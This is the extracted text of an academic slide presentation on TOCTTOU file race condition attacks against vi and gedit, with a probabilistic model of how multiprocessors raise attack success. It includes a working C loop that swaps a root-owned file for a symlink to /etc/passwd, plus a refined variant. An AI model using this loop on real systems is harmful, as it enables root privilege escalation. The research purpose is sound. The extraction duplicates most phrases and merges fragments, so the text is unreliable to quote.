multiprocessors may reduce system dependability under file-based race condition attacks

1

Multiprocessors May Reduce System Multiprocessors May Reduce System Dependability Under File-based Race Dependability Under File-based Race

Condition AttacksCondition Attacks

Jinpeng Wei, Calton PuGeorgia Institute of Technology

Atlanta, Georgia, USA

Presented on DSN-DCCSJune 28, 2007

2

System Dependability: Brief System Dependability: Brief HistoryHistory

Traditionally focused on Traditionally focused on availabilityavailability and and reliabilityreliability (have redundancy, keep (have redundancy, keep running)running)

Now Now securitysecurity and and safetysafety are urgent are urgent issuesissues Widely deployed software systems have Widely deployed software systems have

bugsbugs Software systems are under constant Software systems are under constant

attacks. intended behavior attacks. intended behavior !=!= actual actual behaviorbehavior

3

Multiprocessors: Boon or Multiprocessors: Boon or Bane?Bane?

Definitely they are goodDefinitely they are good Better performanceBetter performance Lower power consumptionLower power consumption More secure: Intrusion detection systemsMore secure: Intrusion detection systems

Unless they fall in bad hands...Unless they fall in bad hands... Attacker can become faster in a Attacker can become faster in a race race

conditioncondition attack, thus making the attack, thus making the system system less secureless secure..

4

It’s Much Easier to Attack It’s Much Easier to Attack TOCTTOU Vulnerabilities on TOCTTOU Vulnerabilities on

MultiprocessorsMultiprocessors

0

20

40

60

80

100

120

vi gedit

Su

cces

s ra

te (

%)

Uniprocessor

Multiprocessor

5

AgendaAgenda

Background about TOCTTOU and the vulneBackground about TOCTTOU and the vulnerabilities with rabilities with vivi and and geditgedit

A probabilistic model for TOCTTOU attacksA probabilistic model for TOCTTOU attacks Probability analysis of exploiting Probability analysis of exploiting vivi Probability and event analysis of exploiting Probability and event analysis of exploiting

geditgedit Parallelizing the attack program on a multiParallelizing the attack program on a multi

processorprocessor ConclusionConclusion

6

Definition and ScopeDefinition and Scope TOCTTOUTOCTTOU – Time of Check To Time – Time of Check To Time

of Use, a kind of file-based race of Use, a kind of file-based race condition in Unix-style systemscondition in Unix-style systems

CheckCheck – Establish some – Establish some precondition (invariant) about a fileprecondition (invariant) about a file

UseUse – Operate on the file assuming – Operate on the file assuming that the invariant is still validthat the invariant is still valid

7

Sendmail ExampleSendmail Example

/home/abc/mailbox a symbolic link?

No

Yes Error handling Check

Use

Run as rootRun as root Operate on files owned by normal usersOperate on files owned by normal users

Establishing the invariant:

/home/abc/mailbox is NOT a symbolic link

Assuming the invariant still holds

Append the new message to /home/abc/mailbox

8

Sendmail Vulnerability: An ExaSendmail Vulnerability: An Examplemple

Append the new message to /home/abc/mailbox (actually to /etc/passwd)

Delete /home/abc/mailbox

Create symbolic link mailbox, pointing to /etc/passwd

Sendmail (root)

Attacker (abc)Time

No

Effect: The attacker may get unauthorized root access!

/home/abc/mailbox a symbolic link?

Check

Use

9

TOCTTOU Vulnerabilities in TOCTTOU Vulnerabilities in Red Hat Linux 9 [1]Red Hat Linux 9 [1]

Application TOCTTOU errors

Possible exploit

vi <open, chown> Changing the owner of /etc/passwd to an ordinary user

gedit <rename, chown>

Changing the owner of /etc/passwd to an ordinary user

rpm <open, open> Running arbitrary command

emacs <open,chmod> Making /etc/shadow readable by an ordinary user

Tested:

~130 utilities from /bin, /sbin and /usr/bin

[1] Jinpeng Wei, Calton Pu. FAST’05

10

vi 6.1 Vulnerabilityvi 6.1 Vulnerability The vulnerability happens whenThe vulnerability happens when

vi is run by rootvi is run by root vi is editing a file owned by a normal user (also the attackevi is editing a file owned by a normal user (also the attacke

r)r) vi saves the file being editedvi saves the file being edited

TOCTTOU pair: <TOCTTOU pair: <open, chownopen, chown>> openopen creates a new file for writing creates a new file for writing chownchown changes the owner of the new file to the normal use changes the owner of the new file to the normal use

r.r.

while ((fd = mch_open((char *)wfname, …)……chown((char*)wfname, st_old.st_uid, st_old.st_gid);

11

gedit 2.8.3 Vulnerabilitygedit 2.8.3 Vulnerability Similar to the vi vulnerabilitySimilar to the vi vulnerability

gedit is run by rootgedit is run by root gedit is editing a file owned by a normal user (also the attgedit is editing a file owned by a normal user (also the att

acker)acker) gedit saves the file being editedgedit saves the file being edited

TOCTTOU pair: <TOCTTOU pair: <rename, chownrename, chown>> renamerename creates a new file creates a new file chownchown changes the owner of the new file to the normal u changes the owner of the new file to the normal u

ser.ser.

/*create and write to temp_filename …*/if (rename (temp_filename, real_filename) != 0){ … }chmod (real_filename, st.st_mode);chown (real_filename, st.st_uid, st.st_gid);

12

An Attack ProgramAn Attack Program1 while (!finish){2 if (stat(filename, &stbuf) == 0){3 if ((stbuf.st_uid == 0) && (stbuf.st_gid == 0))4 { 5 unlink(filename);6 symlink(“/etc/passwd”, filename);7 finish = 1;8 }9 }10 }

Observation: the file owner temporarily Observation: the file owner temporarily becomes root during the vulnerability window.becomes root during the vulnerability window.

Simple, brutal-force.Simple, brutal-force.

13

Event Analysis of Event Analysis of vivi Exploit on a Uniproc Exploit on a Uniprocessoressor

14

AgendaAgenda





15

Some Definitions for the Some Definitions for the Probabilistic ModelProbabilistic Model

Window of VulnerabilityWindow of Vulnerability: the time interval : the time interval between check and use (e.g., <between check and use (e.g., <openopen, , chownchown>).>).

Attack pattern: {Attack pattern: {detectiondetection}}+ + [[attackattack]] detection can be run 1 or more timesdetection can be run 1 or more times attack can be run 0 or 1 timeattack can be run 0 or 1 time

Three process statesThree process states SuspendedSuspended: unable to run (relinquishing CPU): unable to run (relinquishing CPU) ScheduledScheduled: able to run (using CPU): able to run (using CPU) FinishedFinished: finished the attack actions (symbolic : finished the attack actions (symbolic

link replacement, etc)link replacement, etc)

16

A Probabilistic Model for A Probabilistic Model for Predicting TOCTTOU Attack Predicting TOCTTOU Attack

Success RateSuccess Rate

P (attack succeeds) on a multiprocessor is not less than P (attack succeeds) on a multiprocessor is not less than that on a uniprocessor, because of the second part of the that on a uniprocessor, because of the second part of the equation. equation. P (attack scheduled | victim not suspended) = 0 on a uniprocessorP (attack scheduled | victim not suspended) = 0 on a uniprocessor

Success gain due to the second part may become Success gain due to the second part may become significant when P (victim suspended) is very small.significant when P (victim suspended) is very small.

But wait, can the attack finished?But wait, can the attack finished?

P (attack succeeds) = P (victim suspended) * P (attack scheduled | victim suspended) * P (attack finished | victim suspended) + P (victim not suspended) * P (attack scheduled | victim not suspended) * P (attack finished | victim not suspended)

17

P (attack finished | victim not P (attack finished | victim not suspended)suspended)

D = detection time, L = t2 - t1 (Laxity) D = detection time, L = t2 - t1 (Laxity) t1 = the earliest start time for a successful detectiont1 = the earliest start time for a successful detection t2 = the latest start time for a successful detection t2 = the latest start time for a successful detection

leading to a successful attackleading to a successful attack

The answer =

18

AgendaAgenda





19

Success Rate of Attacking Vi on a USuccess Rate of Attacking Vi on a Uniprocessorniprocessor

Between Between 1.5% and 1.5% and 18%18%

Approaches Approaches 0 when file 0 when file size size approaches 0approaches 0

while ((fd = mch_open((char *)wfname, …) /* writing to wfname using fd…*/chown((char*)wfname, st_old.st_uid, st_old.st_gid);

20

100% for files 100% for files with size with size >=20KB>=20KB

L >> DL >> D

Success Rate of Attacking Vi Success Rate of Attacking Vi on a SMPon a SMP

96% for files 96% for files with 1 bytewith 1 byte

L and D L and D become closebecome close

Attack may not Attack may not be scheduledbe scheduled

21

AgendaAgenda





22

gedit Attack Success gedit Attack Success RatesRates

0 on a uniprocessor0 on a uniprocessor 83% on a SMP (2 x 1.7G CPUs, 512MB 83% on a SMP (2 x 1.7G CPUs, 512MB

memory)memory) The delay between The delay between renamerename and and chmodchmod is is

an important contributing factor to L. It is an important contributing factor to L. It is 43 microseconds on the SMP.43 microseconds on the SMP.Table: L and D values in microseconds (SMP)

if (rename (temp_filename, real_filename) != 0){ … }chmod (real_filename, st.st_mode);chown (real_filename, st.st_uid, st.st_gid);

23

gedit Attack on a gedit Attack on a MulticoreMulticore

2 x 3.2G dual-core CPUs with HT, 4GB 2 x 3.2G dual-core CPUs with HT, 4GB memorymemory

No success at all !No success at all ! Why ?Why ?

24

New Observation on the New Observation on the gedit Attackgedit Attack CPU is a necessary but not sufficient condition for a successful attackCPU is a necessary but not sufficient condition for a successful attack

Semaphore on the shared file is another necessary conditionSemaphore on the shared file is another necessary condition The race between gedit and the attacker for the semaphore The race between gedit and the attacker for the semaphore

decides the attack resultdecides the attack result

The delay The delay between between statstat and and unlinkunlink of of the attacker is the attacker is 17 us.17 us.

The delay The delay between between renamerename and and chmodchmod is now is now only 3 us. only 3 us.

There is a 6 us There is a 6 us trap (due to trap (due to page fault) page fault) within the 17 us within the 17 us of the attacker.of the attacker.

25

Rethinking the gedit Attack Rethinking the gedit Attack ProgramProgram

There is a trap when the true branch of There is a trap when the true branch of statement 3 is taken, because statement 3 is taken, because unlinkunlink is never is never invoked before by the attacker …invoked before by the attacker …

Linux kernel dynamically maps shard libraries Linux kernel dynamically maps shard libraries (e.g., (e.g., libclibc) into an application’s address space.) into an application’s address space.

1 while (!finish){2 if (stat(filename, &stbuf) == 0){3 if ((stbuf.st_uid == 0) && (stbuf.st_gid == 0))4 { 5 unlink(filename);6 symlink(“/etc/passwd”, filename);7 finish = 1;8 }9 }10 }

26

The Solution…The Solution… Proactively invoke Proactively invoke unlinkunlink to remove the trap. to remove the trap.

1 while (!finish){ /* argv[1] holds filename */2 if (stat(argv[1], &stbuf) == 0){3 if ((stbuf.st_uid == 0) && (stbuf.st_gid == 0))4 {5 fname = argv[1];6 finish = 1;7 }8 else9 fname = dummy;1011 unlink(fname);12 symlink(“/etc/passwd”, fname);13 }//if stat(argv[1] ..14 }//while

27

New gedit Attack on a New gedit Attack on a MulticoreMulticore

Started to see Started to see successes.successes.

The trap The trap disappeareddisappeared

28

AgendaAgenda





29

Pipelining Attack ProgramPipelining Attack Program

symlinksymlink needs not wait on the completion of needs not wait on the completion of unlinkunlink, , so we can make the attack program multi-threadedso we can make the attack program multi-threaded

The attack can finish much earlier when the shared The attack can finish much earlier when the shared file is large, giving advantage when the vulnerability file is large, giving advantage when the vulnerability window is very smallwindow is very small

30

ConclusionConclusion

A probabilistic model for TOCTTOU attaA probabilistic model for TOCTTOU attacks which captures the reduced system cks which captures the reduced system dependability by the deployment of muldependability by the deployment of multiprocessorstiprocessors

Probability measurement and event anaProbability measurement and event analysis of exploiting lysis of exploiting vi vi and and gedit, gedit, which cowhich corroborate the model and demonstrate hrroborate the model and demonstrate how the attacker may utilize multiprocesow the attacker may utilize multiprocessors to achieve higher success rate.sors to achieve higher success rate.

multiprocessors may reduce system dependability under file-based race condition attacks

Documents